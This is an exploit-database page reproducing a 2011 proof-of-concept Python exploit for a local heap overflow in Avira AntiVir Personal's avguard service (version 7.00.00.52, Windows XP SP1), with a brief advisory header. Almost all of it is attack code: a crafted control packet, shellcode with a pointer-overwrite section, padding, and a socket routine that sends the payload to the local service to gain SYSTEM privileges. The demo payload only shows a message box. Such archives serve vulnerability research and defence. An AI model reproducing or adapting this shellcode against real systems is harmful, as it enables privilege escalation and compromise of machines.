Avira AntiVir Personal – Multiple Code Execution Vulnerabilities (2)

  • 作者: D.Elser
    日期: 2011-01-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35226/
  • source: https://www.securityfocus.com/bid/45807/info
     
    Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
     
    Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
     
    Please note that these issues affect versions of the application that are no longer supported. 
    
    #
    # Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
    # Proof of Concept (PoC) exploit / target: WinXP SP1
    # bug discovered/exploit written by D.Elser
    #
    # by sending two simple TCP packets which will
    # exploit a vulnerability in the Antivir guard
    # service, the user will gain SYSTEM privileges
    #
    # this PoC code will cause the avguard service
    # to show a messagebox within an infinite loop
    
    
    from socket import *
    import sys
    
    # the first packet which is sent must
    # contain a magic ID at offset 0x18
    # and the length of the second packet 
    # to receive
    #
    # offset 0x18 : magic ID
    # offset 0x1C : length of buffer for second packet
    
    
    cpacket = "\x00\x00\x00\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x00\x00" \
    "\x00\x00\x31\x06" \
    "\x00\x00\x00\x40"
    
    
    lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
     "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
     "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
     "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
     "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
     "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
     "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
     "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
     "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
     "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
     "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
     "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
     "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
     "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
     "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
     "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
     "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
     "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
     "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
     "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
     "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
     "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
     "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
     "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
     "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
     "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
     "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
     "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
     "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
     "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
     "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
     "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
     "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"
    
    
    # main part of shellcode
    shellcode = "\x90\x8d\x46\x1b" \
    "\x50\x05\x04\x00" \
    "\x00\x00\x50\x05" \
    "\x19\x00\x00\x00" \
    "\x50\xb8\x2f\x71" \
    "\x42\x00\xff\xd0" \
    "\x90\xeb\xe5\x10" \
    "\x20\x01\x00" \
    "I got SYSTEM privileges!\x00" + lyrics
    
    # fill shellcode up to a specific length
    for i in range(0, 0x4000 - 0x20 - len(shellcode)):
    	shellcode = shellcode + "\x40"
    
    # second part of shellcode which contains
    # the pointers to be overwritten and code
    # which jumps to main part of our shellcode
    shellcode = shellcode + "\xEB\x0E\x90\x90" \
    "\x90\x90\x90\x90" \
    "\x52\xBF\x04\x78" \
    "\xB4\x73\xED\x77" \
    "\x8B\x57\x6C\x8B" \
    "\xF2\x81\xEE\xE0" \
    "\x3F\x00\x00\xFF" \
    "\xE6\x90\x90\x90" \
    "\x90\x90\x90\x90" \
    "\x90\x90\x90\x90" \
    
    	
    s = socket(AF_INET,SOCK_STREAM)
    s.settimeout(1)
    s.connect(("127.0.0.1",18350))
    print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
    "Exploit compatible with XP SP1.\n"
    
    print "Sending control packet (size: 0x%x)" % (len(cpacket))
    s.sendall(cpacket)
    print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
    s.sendall(shellcode)
    print "avguard response:"
    print s.recv(1024)
    sys.exit()